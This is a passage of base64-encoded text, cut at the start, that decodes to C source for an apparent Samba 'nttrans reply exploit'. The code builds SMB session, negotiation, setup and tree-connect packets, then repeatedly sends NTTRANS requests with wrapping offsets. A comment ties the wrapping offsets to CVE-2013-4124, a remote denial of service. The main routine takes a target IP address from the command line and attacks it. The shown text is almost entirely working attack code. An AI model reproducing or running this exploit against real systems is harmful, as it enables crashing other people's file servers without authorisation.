aXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpICsgc2 l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKSArIHNpemVv ZiAoZGF0YSkgKyBzaXplb2YgKGRpYWxlY3RzKV07DQogaW50IG RsZW4gPSBodG9ucyhzaXplb2YgKGRpYWxlY3RzKSk7DQoNCiBt ZW1zZXQoJmRhdGEsICdcMCcsIHNpemVvZiAoZGF0YSkpOw0KIG NvbnN0cnVjdF9uYnRfc2Vzc2lvbl9oZWFkZXIocGFja2V0LCBT TUJfU0VTU0lPTiwgMCwgc2l6ZW9mIChwYWNrZXQpIC0gc2l6ZW 9mIChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSk7DQogcGlk ID0gZ2V0cGlkKCk7DQogY29uc3RydWN0X3NtYl9iYXNlX2hlYW RlcihwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lv bl9oZWFkZXIpLCBTTUJfTkVHUFJPVCwgOCwgMSwgMCwgcGlkLC AwLCAxKTsNCg0KIG1lbWNweSgmZGF0YS5ieXRlY291bnQsICZk bGVuLCBzaXplb2YgKHVpbnQxNikpOw0KDQogbWVtY3B5KHBhY2 tldCArIChzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFk ZXIpICsgc2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKS ksICZkYXRhLCBzaXplb2YgKGRhdGEpKTsNCiBtZW1jcHkocGFj a2V0ICsgKHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2hlYW RlcikgKyBzaXplb2YgKHN0cnVjdCBzbWJfYmFzZV9oZWFkZXIp ICsgc2l6ZW9mIChkYXRhKSksIA0KIGRpYWxlY3RzLCBzaXplb2 YgKGRpYWxlY3RzKSk7DQoNCiBpZiAod3JpdGUoZmQsIHBhY2tl dCwgc2l6ZW9mIChwYWNrZXQpKSA9PSAtMSkNCiB7IGNsb3NlKG ZkKTsNCiBmcHJpbnRmKHN0ZGVyciwgIndyaXRlKCkgZmFpbGVk LCByZWFzb246ICclcycgKGNvZGUgJWkpXG4iLCBzdHJlcnJvci hlcnJubyksIGVycm5vKTsgDQogZXhpdCgtZXJybm8pOw0KIH0N Cn0NCg0Kdm9pZCBwcm9jZXNzX25lZ3Byb3RfcmVwbHkoaW50IG ZkKQ0KeyBzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyICpuYnRf aGRyOw0KIHN0cnVjdCBzbWJfYmFzZV9oZWFkZXIgKmJhc2VfaG RyOw0KIHN0cnVjdCBuZWdwcm90X3JlcGx5X2hlYWRlciAqbnBf cmVwbHlfaGRyOw0KIGNoYXIgcGFja2V0WzEwMjRdOw0KIGludC BzaXplOw0KIHVpbnQxNiBwaWRfcmVwbHk7DQoNCiBuYnRfaGRy ID0gKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIgKilwYWNrZX Q7DQogYmFzZV9oZHIgPSAoc3RydWN0IHNtYl9iYXNlX2hlYWRl ciAqKShwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2 lvbl9oZWFkZXIpKTsNCiBucF9yZXBseV9oZHIgPSAoc3RydWN0 IG5lZ3Byb3RfcmVwbHlfaGVhZGVyICopKHBhY2tldCArIChzaX plb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpICsgDQog c2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKSkpOw0KDQ ogaWYgKChzaXplID0gcmVhZChmZCwgcGFja2V0LCBzaXplb2Yg KHBhY2tldCkpKSA9PSAtMSkNCiB7IGNsb3NlKGZkKTsNCiBmcH JpbnRmKHN0ZGVyciwgInJlYWQoKSBmYWlsZWQsIHJlYXNvbjog JyVzJyAoY29kZSAlaSlcbiIsIHN0cmVycm9yKGVycm5vKSwgZX Jybm8pOyANCiBleGl0KC1lcnJubyk7DQogfQ0KDQogbWVtY3B5 KCZwaWRfcmVwbHksICZiYXNlX2hkci0+cGlkLCBzaXplb2YgKH VpbnQxNikpOw0KIG1lbWNweSgmc2Vzc2lvbmlkLCAmbnBfcmVw bHlfaGRyLT5zZXNzaW9uaWQsIHNpemVvZiAodWludDMyKSk7DQ ogaWYgKGJhc2VfaGRyLT5jb21tYW5kICE9IFNNQl9ORUdQUk9U IHx8IG5wX3JlcGx5X2hkci0+d29yZGNvdW50ICE9IDE3IHx8IH BpZF9yZXBseSAhPSBwaWQpDQogeyBjbG9zZShmZCk7DQogZnBy aW50ZihzdGRlcnIsICJwcm90b2NvbCBuZWdvdGlhdGlvbiBmYW lsZWRcbiIpOw0KIGV4aXQoLTEpOw0KIH0NCg0KIHByaW50Zigi cHJvdG9jb2wgbmVnb3RpYXRpb24gY29tcGxldGVcbiIpOw0KfQ 0KDQp2b2lkIHNlc3NzZXR1cHhfcmVxdWVzdChpbnQgZmQpDQp7 IHVpbnQ4IGRhdGFbXSA9ICJceDEyXHgwXHgwXHgwXHg1NVx4Nm VceDY5XHg3OFx4MDBceDUzXHg2MVx4NmRceDYyXHg2MSI7DQog Y2hhciBwYWNrZXRbc2l6ZW9mIChzdHJ1Y3QgbmJ0X3Nlc3Npb2 5faGVhZGVyKSArIHNpemVvZiAoc3RydWN0IHNtYl9iYXNlX2hl YWRlcikgKyANCiBzaXplb2YgKHN0cnVjdCBzZXNzc2V0dXB4X3 JlcXVlc3RfaGVhZGVyKSArIHNpemVvZiAoZGF0YSldOw0KIGlu dCBzaXplOw0KDQogY29uc3RydWN0X25idF9zZXNzaW9uX2hlYW RlcihwYWNrZXQsIFNNQl9TRVNTSU9OLCAwLCBzaXplb2YgKHBh Y2tldCkgLSBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZW FkZXIpKTsNCiBjb25zdHJ1Y3Rfc21iX2Jhc2VfaGVhZGVyKHBh Y2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2hlYW RlciksIFNNQl9TRVNTU0VUVVBYLCA4LCAxLCAwLCBwaWQsIDAs IDEpOw0KIGNvbnN0cnVjdF9zZXNzc2V0dXB4X2hlYWRlcihwYW NrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFk ZXIpICsgc2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKS k7DQogbWVtY3B5KHBhY2tldCArIHNpemVvZiAoc3RydWN0IG5i dF9zZXNzaW9uX2hlYWRlcikgKyBzaXplb2YgKHN0cnVjdCBzbW JfYmFzZV9oZWFkZXIpICsgDQogc2l6ZW9mIChzdHJ1Y3Qgc2Vz c3NldHVweF9yZXF1ZXN0X2hlYWRlciksICZkYXRhLCBzaXplb2 YgKGRhdGEpKTsNCg0KIGlmICgoc2l6ZSA9IHdyaXRlKGZkLCBw YWNrZXQsIHNpemVvZiAocGFja2V0KSkpID09IC0xKQ0KIHsgY2 xvc2UoZmQpOw0KIGZwcmludGYoc3RkZXJyLCAid3JpdGUoKSBm YWlsZWQsIHJlYXNvbjogJyVzJyAoY29kZSAlaSlcbiIsIHN0cm Vycm9yKGVycm5vKSwgZXJybm8pOyANCiBleGl0KC1lcnJubyk7 DQogfQ0KIGlmIChzaXplICE9IHNpemVvZiAocGFja2V0KSkNCi B7IGNsb3NlKGZkKTsNCiBmcHJpbnRmKHN0ZGVyciwgImNvdWxk bid0IHdyaXRlIGVudGlyZSBwYWNrZXQsIGFib3J0aW5nIVxuIi k7DQogZXhpdCgtMSk7DQogfQ0KfQ0KDQp2b2lkIHByb2Nlc3Nf c2Vzc3NldHVweF9yZXBseShpbnQgZmQpDQp7IHN0cnVjdCBuYn Rfc2Vzc2lvbl9oZWFkZXIgKm5idF9oZHI7DQogc3RydWN0IHNt Yl9iYXNlX2hlYWRlciAqYmFzZV9oZHI7DQogc3RydWN0IHNlc3 NzZXR1cHhfcmVwbHlfaGVhZGVyICpzeF9oZHI7DQogY2hhciBw YWNrZXRbMTAyNF07DQogaW50IHNpemUsIGxlbjsNCg0KIGlmIC goc2l6ZSA9IHJlYWQoZmQsIHBhY2tldCwgc2l6ZW9mIChwYWNr ZXQpKSkgPT0gLTEpDQogeyBjbG9zZShmZCk7DQogZnByaW50Zi hzdGRlcnIsICJyZWFkKCkgZmFpbGVkLCByZWFzb246ICclcycg KGNvZGUgJWkpXG4iLCBzdHJlcnJvcihlcnJubyksIGVycm5vKT sgDQogZXhpdCgtZXJybm8pOw0KIH0NCg0KIG5idF9oZHIgPSAo c3RydWN0IG5idF9zZXNzaW9uX2hlYWRlciAqKXBhY2tldDsNCi BiYXNlX2hkciA9IChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyICop KHBhY2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2 hlYWRlcikpOw0KIHN4X2hkciA9IChzdHJ1Y3Qgc2Vzc3NldHVw eF9yZXBseV9oZWFkZXIgKikocGFja2V0ICsgc2l6ZW9mIChzdH J1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIHNpemVvZiAoc3Ry dWN0IHNtYl9iYXNlX2hlYWRlcikpOw0KDQogbWVtY3B5KCZsZW 4sICZuYnRfaGRyLT5sZW4sIHNpemVvZiAodWludDE2KSk7DQog bWVtY3B5KCZ1aWQsICZiYXNlX2hkci0+dWlkLCBzaXplb2YgKH VpbnQxNikpOw0KDQogaWYgKHN4X2hkci0+eGNvbW1hbmQgIT0g MHhmZiAmJiBzeF9oZHItPndvcmRjb3VudCAhPSAzKQ0KIHsgY2 xvc2UoZmQpOw0KIGZwcmludGYoc3RkZXJyLCAic2Vzc2lvbiBz ZXR1cCBmYWlsZWRcbiIpOw0KIGV4aXQoLTEpOw0KIH0NCg0KIH ByaW50Zigic2Vzc2lvbiBzZXR1cCBjb21wbGV0ZSwgZ290IGFz c2lnbmVkIHVpZCAlaVxuIiwgdWlkKTsNCn0NCg0Kdm9pZCB0Y2 9ueF9yZXF1ZXN0KGludCBmZCkNCnsgDQogY2hhciAqcGFja2V0 Ow0KIGludCBzaXplLCBwa3RzaXplID0gc2l6ZW9mIChzdHJ1Y3 QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIHNpemVvZiAoc3RydWN0 IHNtYl9iYXNlX2hlYWRlcikgKw0KIHNpemVvZiAoc3RydWN0IH Rjb254X3JlcXVlc3RfaGVhZGVyKSArIHN0cmxlbih0Y29ueF9z ZXJ2ZXJuYW1lKSArIDE1Ow0KDQogaWYgKChwYWNrZXQgPSBtYW xsb2MocGt0c2l6ZSkpID09IE5VTEwpDQogeyBjbG9zZShmZCk7 DQogZnByaW50ZihzdGRlcnIsICJtYWxsb2MoKSBmYWlsZWQsIG Fib3J0aW5nIVxuIik7DQogZXhpdCgtMSk7DQogfQ0KDQogY29u c3RydWN0X25idF9zZXNzaW9uX2hlYWRlcihwYWNrZXQsIFNNQl 9TRVNTSU9OLCAwLCBwa3RzaXplIC0gc2l6ZW9mIChzdHJ1Y3Qg bmJ0X3Nlc3Npb25faGVhZGVyKSk7DQogY29uc3RydWN0X3NtYl 9iYXNlX2hlYWRlcihwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBu YnRfc2Vzc2lvbl9oZWFkZXIpLCBTTUJfVENPTlgsIDgsIDEsID AsIHBpZCwgdWlkLCAxKTsNCiBjb25zdHJ1Y3RfdGNvbnhfaGVh ZGVyKHBhY2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW 9uX2hlYWRlcikgKyBzaXplb2YgKHN0cnVjdCBzbWJfYmFzZV9o ZWFkZXIpKTsNCg0KIGlmICgoc2l6ZSA9IHdyaXRlKGZkLCBwYW NrZXQsIHBrdHNpemUpKSA9PSAtMSkNCiB7IGNsb3NlKGZkKTsN CiBmcHJpbnRmKHN0ZGVyciwgIndyaXRlKCkgZmFpbGVkLCByZW Fzb246ICclcycgKGNvZGUgJWkpXG4iLCBzdHJlcnJvcihlcnJu byksIGVycm5vKTsgDQogZXhpdCgtZXJybm8pOw0KIH0NCg0KIG ZyZWUocGFja2V0KTsNCg0KIGlmIChzaXplICE9IHBrdHNpemUp DQogeyBjbG9zZShmZCk7DQogZnByaW50ZihzdGRlcnIsICJjb3 VsZG4ndCB3cml0ZSBlbnRpcmUgcGFja2V0LCBhYm9ydGluZyFc biIpOw0KIGV4aXQoLTEpOw0KIH0gDQp9DQoNCnZvaWQgcHJvY2 Vzc190Y29ueF9yZXBseShpbnQgZmQpDQp7IHN0cnVjdCBuYnRf c2Vzc2lvbl9oZWFkZXIgKm5idF9oZHI7DQogc3RydWN0IHNtYl 9iYXNlX2hlYWRlciAqYmFzZV9oZHI7DQogc3RydWN0IHRjb254 X3JlcGx5X2hlYWRlciAqdHhfaGRyOw0KIGNoYXIgcGFja2V0Wz EwMjRdOw0KIGludCBzaXplLCBieXRlY291bnQ7DQogDQogaWYg KChzaXplID0gcmVhZChmZCwgcGFja2V0LCBzaXplb2YgKHBhY2 tldCkpKSA9PSAtMSkNCiB7IGNsb3NlKGZkKTsNCiBmcHJpbnRm KHN0ZGVyciwgInJlYWQoKSBmYWlsZWQsIHJlYXNvbjogJyVzJy AoY29kZSAlaSlcbiIsIHN0cmVycm9yKGVycm5vKSwgZXJybm8p Ow0KIGV4aXQoLWVycm5vKTsNCiB9DQoNCiBuYnRfaGRyID0gKH N0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIgKilwYWNrZXQ7DQog YmFzZV9oZHIgPSAoc3RydWN0IHNtYl9iYXNlX2hlYWRlciAqKS hwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9o ZWFkZXIpKTsNCiB0eF9oZHIgPSAoc3RydWN0IHRjb254X3JlcG x5X2hlYWRlciAqKShwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBu YnRfc2Vzc2lvbl9oZWFkZXIpICsgc2l6ZW9mIChzdHJ1Y3Qgc2 1iX2Jhc2VfaGVhZGVyKSk7DQoNCiBtZW1jcHkoJnRpZCwgJmJh c2VfaGRyLT50aWQsIHNpemVvZiAodWludDE2KSk7DQogbWVtY3 B5KCZieXRlY291bnQsICZ0eF9oZHItPmJ5dGVjb3VudCwgc2l6 ZW9mICh1aW50MTYpKTsNCg0KIHByaW50ZigidHJlZSBjb25uZW N0IGNvbXBsZXRlLCBnb3QgYXNzaWduZWQgdGlkICVpXG4iLCB0 aWQpOw0KfQ0KDQp2b2lkIG50dHJhbnNfcmVxdWVzdChpbnQgZm QsIHVuc2lnbmVkIGludCBvZmZzZXRfd3JhcCkgeyANCgkvLyBw YWNrZXQgPSBuYnQgc2Vzc2lvbiBoZWFkZXIgKyBzbWIgYmFzZS BoZWFkZXIgKyBudHRyYW5zIGhlYWRlciENCgljaGFyIHBhY2tl dFtzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpIC sgDQoJCQkJc2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVy KSArIA0KCQkJCXNpemVvZiAoc3RydWN0IG50dHJhbnNfcmVxdW VzdF9oZWFkZXIpXTsNCglzdHJ1Y3QgbnR0cmFuc19yZXF1ZXN0 X2hlYWRlciBudHRyYW5zX2hkcjsJLy8gbnR0cmFucyBoZWFkZX IhDQoJaW50IHNpemU9MDsNCglpbnQgZnVuY3Rpb24gPSBTTUJf TlRUUkFOU0NSRUFURTsJLy8gTlRUUkFOU0NSRUFURSENCglpbn QgdG90YWxwYXJhbWNvdW50ID0gVE9UQUxDT1VOVDsNCglpbnQg dG90YWxkYXRhY291bnQgPSAwOw0KCXVpbnQ4IHNldHVwY291bn QgPSAwOw0KDQoJbWVtc2V0KCZudHRyYW5zX2hkciwgMCwgc2l6 ZW9mIG50dHJhbnNfaGRyKTsNCg0KCS8vIGNvbnN0cnVjdCBuYn Qgc2Vzc2lvbiBoZWFkZXINCgljb25zdHJ1Y3RfbmJ0X3Nlc3Np b25faGVhZGVyKHBhY2tldCwgU01CX1NFU1NJT04sIDAsIHNpem VvZiAocGFja2V0KSAtIHNpemVvZiAoc3RydWN0IG5idF9zZXNz aW9uX2hlYWRlcikpOw0KCS8vIGNvbnN0cnVjdCBzbWIgYmFzZS BoZWFkZXINCgljb25zdHJ1Y3Rfc21iX2Jhc2VfaGVhZGVyKHBh Y2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2hlYW RlciksIFNNQl9OVFRSQU5TLCA4LCAxLCB0aWQsIHBpZCwgdWlk LCAxKTsNCg0KCS8vIGNvbnN0cnVjdCBudHRyYW5zIGhlYWRlcg 0KCXNwcmludGYobnR0cmFuc19oZHIucGFyYW1vZmZzZXQsICIl cCIsIG9mZnNldF93cmFwKTsNCg0KCS8qKioqKioqKioqDQoJIC ogWFhYIGRhdGEgb2Zmc2V0IDB4ZmZmZmZmZmYgdG8gMHhmMTAw MDAwMCB0byBpbnRlZ2VyIHdyYXANCgkgKgkJdGhlIG9mZnNldC BleHBsb2l0cyB0aGUgc2VjdXJpdHkgYnVnIG9mIENWRS0yMDEz LTQxMjQNCgkgKiAgICAgIHNhbWJhIHJlbW90ZSBkb3MhDQogIC AgICovDQoJc3ByaW50ZihudHRyYW5zX2hkci5kYXRhb2Zmc2V0 LCAiJXAiLCBvZmZzZXRfd3JhcCk7DQoNCgludHRyYW5zX2hkci 53b3JkY291bnQgPSAxOSArIHNldHVwY291bnQ7DQoJbWVtY3B5 KCZudHRyYW5zX2hkci5mdW5jdGlvbiwgJmZ1bmN0aW9uLCBzaX plb2YgKHVpbnQxNikpOw0KCW1lbWNweSgmbnR0cmFuc19oZHIu dG90YWxwYXJhbWNvdW50LCAmdG90YWxwYXJhbWNvdW50LCBzaX plb2YgKHVpbnQzMikpOw0KCW1lbWNweSgmbnR0cmFuc19oZHIu dG90YWxkYXRhY291bnQsICZ0b3RhbGRhdGFjb3VudCwgc2l6ZW 9mICh1aW50MzIpKTsNCgltZW1jcHkocGFja2V0ICsgc2l6ZW9m IChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIHNpemVvZi Aoc3RydWN0IHNtYl9iYXNlX2hlYWRlciksICZudHRyYW5zX2hk ciwgc2l6ZW9mIG50dHJhbnNfaGRyKTsNCg0KCS8vIHNlbmQgc2 FtYmEgcGFja2V0IQ0KCXNpemUgPSB3cml0ZShmZCwgcGFja2V0 LCBzaXplb2YgKHBhY2tldCkpOw0KCWNsb3NlKGZkKTsNCg0KfQ 0KDQpzdGF0aWMgY2hhciBiYW5uZXJbXT17DQoiICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgX19fICAgIF9fXy AgICAgICAgICAgICAgXG4iIFwNCiIgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIC8gXyBcXCAgLyBfIFxcICAgIC AgICAgICBcbiIgXA0KIiAgICAgICAgICAgICAgICAgICAgICAg ICAgICBfXyAgX198IChfKSB8fCB8IHwgfCAgX19fICAgICAgIF xuIiBcDQoiICAgICAgICAgICAgICAgICAgICAgICAgICAgIFxc IFxcLyAvIFxcX18uIHx8IHwgfCB8IC8gX198ICAgXG4iIFwNCi IgICAgICAgICAgICAgICAgICAgICAgICAgICAgID4gIDwgICAg LyAvIHwgfF98IHx8IChfXyAgICAgICBcbiIgXA0KIiAgICAgIC AgICAgICAgICAgICAgICAgICAgICAvXy9cXF9cXCAgL18vICAg XFxfX18vICBcXF9fX3wgIFxuIiBcDQp9Ow0KDQppbnQgbWFpbi hpbnQgYXJnYywgY2hhciAqYXJndltdKSB7DQoJaW50IGZkOw0K CXN0cnVjdCBzb2NrYWRkcl9pbiBzX2luOw0KCWNoYXIgdGFyZ2 V0X2lwWzE2XTsNCgljaGFyIHNlcnZlcl9uYW1lWzMyXTsNCglp bnQgc21iX3BvcnQ9MTM5Ow0KICAgIHVuc2lnbmVkIGludCBvZm ZzZXRfd3JhcD0weDAwMDAwMDAwOw0KDQogICAgcHJpbnRmKCIl c1xuXG5zYW1iYSBudHRyYW5zIHJlcGx5IGV4cGxvaXRcblxuIi wgYmFubmVyKTsNCg0KCWlmKGFyZ2MgPCAyKXsNCgkJZnByaW50 ZihzdGRlcnIsICJzYW1iYSBudHRyYW5zIHJlcGx5IGV4cGxvaX QgVXNhZ2U6XG5cbi4vc2FtYmFfZXhwbG9pdCBbdGFyZ2V0IGlw IGFkZHJdIDxzZXJ2ZXIgbmFtZT5cblxuIg0KCQkJCQkJImV4KS AuL3NhbWJhX2V4cGxvaXQgMTAuMC4xLjE2XG4iDQoJCQkJCQki ZXgpIC4vc2FtYmFfZXhwbG9pdCAxMC4wLjEuMTYgTVlTQU1CQV xuXG4iKTsNCg0KCQlleGl0KC0xKTsNCgl9DQoNCglzdHJuY3B5 KHRhcmdldF9pcCwgYXJndlsxXSwgMTYpOw0KDQoJaWYoYXJnYz 09Myl7DQoJCW1lbXNldChzZXJ2ZXJfbmFtZSwgMCwgc2l6ZW9m IHNlcnZlcl9uYW1lKTsNCgkJc3RybmNweShzZXJ2ZXJfbmFtZS wgYXJndlsyXSwgc2l6ZW9mKHNlcnZlcl9uYW1lKS0xKTsNCgl9 IGVsc2V7DQoJCXNwcmludGYoc2VydmVyX25hbWUsICJTQU1CQS IpOw0KCX0NCg0KCXByaW50ZigiWypdIFNFUlZFUiBOQU1FOiAl c1xuIiwgc2VydmVyX25hbWUpOw0KDQogICAgbWVtc2V0KCZzX2 luLCAwLCBzaXplb2YgKHNfaW4pKTsNCiAgICBzX2luLnNpbl9m YW1pbHkgPSBBRl9JTkVUOw0KICAgIHNfaW4uc2luX3BvcnQgPS BodG9ucyhzbWJfcG9ydCk7CS8vIHNhbWJhIHBvcnQ9MTM5L3Rj cA0KICAgIHNfaW4uc2luX2FkZHIuc19hZGRyID0gaW5ldF9hZG RyKHRhcmdldF9pcCk7DQoNCiAgICBmZCA9IHNvY2tldChBRl9J TkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApOw0KICAgIG Nvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmc19pbiwg c2l6ZW9mIChzX2luKSk7DQoNCgkvLyBuYnQobmV0YmlvcyBvdm VyIHRjcGlwLCBuYnRzdGF0KSBzZXNzaW9uIHJlcXVlc3QNCglu YnRfc2Vzc2lvbl9yZXF1ZXN0KGZkLCAiQk9TU0EiLCBzZXJ2ZX JfbmFtZSk7CS8vIGFkanVzdCBjb21wdXRlciBuYW1lcyhjbGll bnRuYW1lLCBzZXJ2ZXJuYW1lKQ0KICAgIHByb2Nlc3NfbmJ0X3 Nlc3Npb25fcmVwbHkoZmQpOw0KDQoJLy8gcHJvdG9jb2wgbmVn b3RpYXRpb24NCiAgICBuZWdwcm90X3JlcXVlc3QoZmQpOw0KIC AgIHByb2Nlc3NfbmVncHJvdF9yZXBseShmZCk7DQogDQogICAg Ly8gc2Vzc2lvbiBzZXR1cA0KICAgIHNlc3NzZXR1cHhfcmVxdW VzdChmZCk7CS8vIHNldHVwIHJlcXVlc3QNCiAgICBwcm9jZXNz X3Nlc3NzZXR1cHhfcmVwbHkoZmQpOwkvLyBzZXR1cCByZXBseQ 0KDQogICAgLy8gdHJlZSBjb25uZWN0aW9uIHNldHVwDQogICAg dGNvbnhfcmVxdWVzdChmZCk7DQogICAgcHJvY2Vzc190Y29ueF 9yZXBseShmZCk7DQoNCgkvLyBleHBsb2l0IQ0KCXByaW50Zigi WypdIG50dHJhbnMgcmVwbHkgZXhwbG9pdCFcbiIpOw0KDQoJLy 8gMHhmZmZmZmZmZiB+IDB4ZjEwMDAwMDAwMCB0byBpbnRlZ2Vy IHdyYXANCglmb3Iob2Zmc2V0X3dyYXA9MHhmZmZmZmZmZjsgb2 Zmc2V0X3dyYXAgPj0gMHhmMTAwMDAwMDsgLS1vZmZzZXRfd3Jh cCl7DQoJCXByaW50ZigiWy1dIG9mZnNldCB0byB3cmFwIHVwOi AlcFxuIiwgb2Zmc2V0X3dyYXApOw0KCQludHRyYW5zX3JlcXVl c3QoZmQsIG9mZnNldF93cmFwKTsNCgl9DQoNCgljbG9zZShmZC k7DQoNCglyZXR1cm4gMDsNCn0= end EOF